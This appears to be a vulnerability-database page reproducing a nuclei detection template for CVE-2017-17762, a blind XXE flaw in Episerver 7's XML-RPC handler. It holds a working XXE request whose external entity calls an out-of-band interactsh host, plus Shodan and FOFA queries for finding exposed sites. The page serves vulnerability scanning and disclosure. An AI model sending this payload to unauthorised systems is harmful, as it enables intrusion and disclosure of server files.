CVE-2017-17762: Episerver 7 - Blind XML External Entity Injection

日期: 2026-01-08 | 影响软件: Episerver 7 | POC: 已公开

漏洞描述

Episerver 7 patch 4 and earlier contains an XML external entity (XXE) caused by processing crafted DTD in XML requests involving util/xmlrpc/Handler.ashx, letting remote attackers read arbitrary files, exploit requires sending malicious XML payloads.

PoC代码[已公开]

id: CVE-2017-17762

info:
  name: Episerver 7 - Blind XML External Entity Injection
  author: pussycat0x
  severity: high
  description: |
    Episerver 7 patch 4 and earlier contains an XML external entity (XXE) caused by processing crafted DTD in XML requests involving util/xmlrpc/Handler.ashx, letting remote attackers read arbitrary files, exploit requires sending malicious XML payloads.
  impact: |
    Remote attackers can read sensitive files from the server, leading to information disclosure.
  remediation: |
    Update to the latest version of Episerver or apply security patches that fix XXE vulnerabilities.
  reference:
    - https://gist.github.com/jonaslejon/5f92779848360a1a1e676af0795bd9aa
    - https://kryptera.se/sarbarhet-i-episerver/
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2017-17762
    cwe-id: CWE-611
    epss-score: 0.1358
    epss-percentile: 0.93996
    cpe: cpe:2.3:a:episerver:episerver:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: episerver
    product: episerver
    shodan-query:
      - http.html:"episerver"
      - cpe:"cpe:2.3:a:episerver:episerver"
      - http.html:"epihash"
    fofa-query:
      - body="episerver"
      - body="epihash"
  tags: cve,cve2017,xxe,oast,episerver,oob

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /util/xmlrpc/Handler.ashx HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "EPiServer")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        POST /util/xmlrpc/Handler.ashx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml
        Accept: */*

        <?xml version="1.0" encoding="UTF-8"?>
        <!DOCTYPE methodCall [
          <!ENTITY % xxe SYSTEM "http://{{interactsh-url}}">
          %xxe;
        ]>
        <methodCall>
          <methodName>system.listMethods</methodName>
          <params></params>
        </methodCall>

    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol,'dns')"
          - 'status_code == 200 || status_code == 500'
        condition: and
# digest: 4a0a00473045022100cac9e6a2c50dedd113cb26eff1d1e8f0c4c0b261bd13fcf20a11b76f630ae0a402206de746e739aa440217d82c9a8d4b706e3508c304ebf90fe766270866867e8a6e:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2017/CVE-2017-17762.yaml

相关漏洞推荐